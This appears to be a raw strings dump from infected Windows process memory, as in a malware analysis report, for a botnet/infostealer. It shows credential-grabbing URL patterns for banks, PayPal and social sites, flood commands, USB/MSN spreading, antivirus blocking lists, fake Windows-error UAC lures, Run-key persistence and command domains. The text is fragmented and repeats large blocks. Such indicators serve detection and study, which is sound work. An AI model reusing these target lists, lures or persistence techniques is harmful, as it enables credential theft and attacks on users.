re>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d 
KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" 
s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. 
[e="%d"]</pre>
<b>svchost.exe_1192_rwx_00CF0000_0004E000:</b>
<b>imapi.exe_1264_rwx_00A70000_0004E000:</b>
<b>spoolsv.exe_1440_rwx_00F50000_0004E000:</b>
<b>Explorer.EXE_1912_rwx_021E0000_00027000:</b>
<b>Explorer.EXE_1912_rwx_02208000_00072000:</b><pre>Windows 
Defender\MSASCui.exe</pre><pre>MpSvc.dll</pre><pre>msseces.exe</pre><pre>MsMpEng.exe</pre><pre>MSASCui.exe</pre><pre>MpAsDesc.dll</pre><pre>MsMpLics.dll</pre><pre>avgui.exe</pre><pre>avgidsagent.exe</pre><pre>avgwdsvc.exe</pre><pre>avgdiagex.exe</pre><pre>avgmfapx.exe</pre><pre>avgupd.exe</pre><pre>avgcfgex.exe</pre><pre>avgnt.exe</pre><pre>avguard.exe</pre><pre>avshadow.exe</pre><pre>avcenter.exe</pre><pre>update.dll</pre><pre>updaterc.dll</pre><pre>usrreq.exe</pre><pre>ccsvchst.exe</pre><pre>symerr.exe</pre><pre>NIS.exe</pre><pre>NAV.exe</pre><pre>navw32.exe</pre><pre>avastui.exe</pre><pre>AvastEmUpdate.exe</pre><pre>ashUpd.exe</pre><pre>WRSA.exe</pre><pre>zatray.exe</pre><pre>ForceField.exe</pre><pre>updating.dll</pre><pre>fshoster32.exe</pre><pre>fsaua.dll</pre><pre>PSUNMain.exe</pre><pre>PSUAService.exe</pre><pre>PSANHost.exe</pre><pre>PSUNScan.dll</pre><pre>epavjobs.exe</pre><pre>AVENGINE.exe</pre><pre>Upgrader.exe</pre><pre>adaware.exe</pre><pre>BullGuard.exe.manifest</pre><pre>BullGuardUpdate.exe</pre><pre>BullGuard.exe</pre><pre>BullGuardScanner.exe</pre><pre>BullGuardBhvScanner.exe</pre><pre>BullGuardUpdate2.exe</pre><pre>BgScan.exe</pre><pre>BgScanEngine.dll</pre><pre>.manifest</pre><pre>updater.exe</pre><pre>Backup\RSD\RSSetup\updater.exe</pre><pre>RsTray.exe</pre><pre>RavMonD.exe</pre><pre>RsMgrSvc.exe</pre><pre>rsmain.exe</pre><pre>RsScan.dll</pre><pre>RsTray.dll</pre><pre>mbamgui.exe</pre><pre>mbam.exe</pre><pre>pctsGui.exe</pre><pre>pctsAuxs.exe</pre><pre>pctsSvc.exe</pre><pre>Update.exe</pre><pre>UpdateHlpr.dll</pre><pre>Definitions\vcore.dll</pre><pre>sbamui.exe</pre><pre>SBAMTray.exe</pre><pre>updater_client_mod.dll</pre><pre>FProtTray.exe</pre><pre>FPWin.exe</pre><pre>scf.dat</pre><pre>ALUpdate.exe</pre><pre>update_tmp.exe</pre><pre>arcaclean.exe</pre><pre>BavUpdater.exe</pre><pre>rcfp.exe</pre><pre>CLPSLA.exe</pre><pre>op_mon.exe</pre><pre>niu.exe</pre><pre>K7TSUpdT.exe</pre><pre>sguardxup.exe</pre><pre>ccupdate.exe</pre><pre>caupdate.dll</pre><
pre>a2guard.exe</pre><pre>a2start.exe</pre><pre>a2service.exe</pre><pre>AVKTray.exe</pre><pre>GDSC.exe</pre><pre>AVK.exe</pre><pre>GDFirewallTray.exe</pre><pre>Bka.exe</pre><pre>BLuPro.exe</pre><pre>BkavSystemServer.exe</pre><pre>BkavService.exe</pre><pre>LiveUpdate.dll</pre><pre>LiveConnect.dll</pre><pre>BaseFile\Bkav\LiveUpdate.dll</pre><pre>V3Lite.exe</pre><pre>ASDSvc.exe</pre><pre>autoup.exe</pre><pre>downloader.exe</pre><pre>%s.config</pre><pre>updatesrv.exe</pre><pre>updatemgr.dll</pre><pre>egui.exe</pre><pre>ekrn.exe</pre><pre>x86\ekrn.exe</pre><pre>uWinMgr.exe</pre><pre>coreServiceShell.exe</pre><pre>uiSeAgnt.exe</pre><pre>uiWatchDog.exe</pre><pre>plugins\plugUpdater.dll</pre><pre>UiFrmwrk\uiUpdateTray.exe</pre><pre>coreFrameworkHost.exe</pre><pre>mcagent.exe</pre><pre>McSvHost.exe</pre><pre>McUICnt.exe</pre><pre>McPvTray.exe</pre><pre>mcui_exe</pre><pre>mcpltui_exe</pre><pre>mcshell.exe</pre><pre>mcupdmgr.exe</pre><pre>mcupdate.exe</pre><pre>mcshield.exe</pre><pre>mcupdui.dll</pre><pre>McAPExe.exe</pre><pre>.config</pre><pre>Image File Execution Options\%s</pre><pre>SYSTEM\CurrentControlSet\services\%s</pre><pre>%c:\ntusbdriver.sys</pre><pre>%c:\*p.exe</pre><pre>%c:\%s</pre><pre>p.exe</pre><pre>%WinDir%\explorer.exe</pre><pre>/C start /d. %s&"%s"</pre><pre>%COMSPEC%</pre><pre>%WinDir%\system32\shell32.dll</pre><pre>%c:\%s.lnk</pre><pre>VisthAux.exe</pre><pre>explorer.exe</pre><pre>t.minecraft</pre><pre>Works! 
PID: %d, Name: %s</pre><pre>cmdvirth</pre><pre>%s%s\X</pre><pre>tcp://</pre><pre>svchost.exe</pre><pre>csrss.exe</pre><pre>lsass.exe</pre><pre>smss.exe</pre><pre>wscript.exe</pre><pre>cscript.exe</pre><pre>vbc.exe</pre><pre>rundll32.exe</pre><pre>regsvr32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>winlogon.exe</pre><pre>services.exe</pre><pre>%s\x.lnk</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>desktop.ini</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows</pre><pre>wintrust.dll</pre><pre>chrome.dll</pre><pre>Applications\iexplore.exe\shell\open\command</pre><pre>%s_xx</pre><pre>x.zip</pre><pre>Navw32.exe</pre><pre>SysInspector.exe</pre><pre>avscan.exe</pre><pre>mfefire.exe</pre><pre>wuauclt.exe</pre><pre>WerFault.exe</pre><pre>lFileZilla\sitemanager.xml</pre><pre>port</pre><pre>Sites.dat</pre><pre>Quick.dat</pre><pre>%s\3\%s</pre><pre>%s\4\%s</pre><pre>spoolsv.exe</pre><pre>steam.exe</pre><pre>skype.exe</pre><pre>origin.exe</pre><pre>dwm.exe</pre><pre>tapi3.dll</pre><pre>/C copy "%s" "%s"</pre><pre>SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Update Service</pre><pre>"%s" /%s</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST</pre><pre>schtasks.exe</pre><pre>/DELETE /TN "Windows Update Check - 0xX" /F</pre><pre>\Windows\Explorer.exe</pre><pre>Low_X</pre><pre>%s.manifest</pre><pre>PendingFileRenameOperations</pre><pre>%s\X</pre><pre>Windows\CurrentVersion\Run</pre><pre>CurrentVersion\Windows</pre><pre>Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>Windows has encountered a corrupted folder on your hard drive</pre><pre>Multiple corrupted files have been found in the folder 'My Documents'. 
To prevent serious loss of data, please allow Windows to restore these files.</pre><pre>Corrupted folder: %s</pre><pre>Corrupted file count: %d</pre><pre><a href=".ms">%s</a></pre><pre>/c start "" "%s" /%s "%s"</pre><pre>shell32,ShellExec_RunDLL "%s" /%s "%s"</pre><pre>You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.</pre><pre>Windows 3.1 Update Service</pre><pre>%s:Zone.Identifier</pre><pre>%s\X.pif</pre><pre>KERNEL32.DLL</pre><pre>KERNELBASE.DLL</pre><pre>kernelbase.dll</pre><pre>oSome operation could not be performed because the system is out of resources. Close some windows and try again.</pre><pre>Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\Explorer</pre><pre>UThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.</pre><pre>Description: BThe "Portable Network Graphics" image contains an invalid palette.</pre><pre>The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. 
This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.</pre><pre>This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.</pre><pre>There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'</pre><pre>%s parameter cannot be nil#Feature not supported by this style</pre><pre>Style '%s' is not registered"Cannot unregister the system style</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Failed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corrupted</pre><pre>Login</pre><pre>"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or later</pre><pre>Button%d</pre><pre>RadioButton%d</pre><pre>Unable to load style '%s'</pre><pre>Unable to load styles: %s</pre><pre>Style '%s' already 
registered#Style class '%s' already registered</pre><pre>Style '%s' not found</pre><pre>Style class '%s' not found</pre><pre>All Clipboard does not support Icons</pre><pre>Cannot open clipboard: %s</pre><pre>Text exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form</pre><pre>- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array</pre><pre>&Password</pre><pre>Value must be between %d and %d</pre><pre>%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parent</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'</pre><pre>%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collection</pre><pre>Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)</pre><pre>Unsupported clipboard format</pre><pre>Canvas does not allow drawing#Text format flag '%s' not supported</pre><pre>Windows Server 2003</pre><pre>Windows Server 2003 R2</pre><pre>Windows Server 2012</pre><pre>Windows 8</pre><pre>Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %s</pre><pre>Observer is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operation</pre><pre>Parameter count mismatch<Type><pre>Windows</pre><pre>Windows 
Vista</pre><pre>Windows Server 2008</pre><pre>Windows 7</pre><pre>Windows Server 2008 R2</pre><pre>Windows 2000</pre><pre>Windows XP</pre><pre>Timespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValue</pre><pre>No help found for context %d</pre><pre>No help found for %s</pre><pre>Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d</pre><pre>The specified path is too long The specified path was not found The path format is not supported</pre><pre>The drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filters</pre><pre>Invalid Timeout value: %s</pre><pre>Failed to create key %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread</pre><pre>Unable to write to %s</pre><pre>Invalid file name - %s</pre><pre>'%s' is an invalid mask at (%d)$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class</pre><pre>Error reading %s%s%s: %s</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize 
called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>Object lock not owned(Monitor support function not initialized</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>Invalid variant operation</pre><pre>Invalid NULL variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable</pre><pre>Integer overflow Invalid floating point operation</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. 
%s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre><unknown>!'%s' is not a valid integer value('%s' is not a valid floating point value</unknown></pre><pre>'%s' is not a valid date</pre><pre>'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp</pre><pre>'%s' is not a valid GUID value</pre><pre>I/O error %d</pre><b>Explorer.EXE_1912_rwx_02500000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0Q</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL 
'%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sess
ions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d 
KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" 
